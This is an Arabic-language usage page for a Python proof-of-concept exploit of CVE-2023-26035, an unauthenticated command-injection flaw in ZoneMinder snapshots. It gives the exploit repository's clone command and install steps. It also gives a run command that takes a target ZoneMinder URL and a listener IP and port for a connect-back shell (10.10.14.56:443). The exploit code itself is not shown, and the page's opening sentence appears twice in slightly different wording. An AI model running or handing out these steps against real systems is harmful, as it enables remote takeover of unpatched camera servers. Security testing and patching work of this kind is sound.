
هذا سكريبت مكتوب بلغة بايثون يسمح باستغلال الثغرة الأمنية في Zoneminder الموصوفة في CVE-2023-26035.
هذا سكربت مكتوب بلغة Python يتيح استغلال الثغرة الأمنية في ZoneMinder الموصوفة في CVE-2023-26035. النظام معرض للخطر في الإصدارات السابقة لـ 1.36.33 و 1.37.33.
انسخ المستودع إلى جهازك وقم بتثبيت التبعيات باستخدام pip (يُوصى باستخدام virtualenv لإنشاء بيئة منفصلة لعزل هذه التثبيتات عن التثبيتات العامة)
git clone https://github.com/m3m0o/zoneminder-snapshots-rce-poc
cd zoneminder-snapshots-rce-poc
pip install -r requirements.txt
يحتاج السكربت إلى عنوان URL الهدف مع المسار الجذري لـ ZoneMinder (مثل **http://example.com/zm**، أو **http://example.com**، أو http://example.com/zoneminder) و IP أو النطاق للجهاز الهدف الذي سيتصل به، و المنفذ للجهاز الهدف الذي سيتصل به. إليك مثال:
python3 main.py -u http://zoneminder.target:8000 -i 10.10.14.56 -p 443

ثغرة تنفيذ أوامر عن بُعد بدون مصادقة في اللقطات
قاعدة بيانات الثغرات والاستغلالات من Rapid7 – حقن أوامر في لقطات ZoneMinder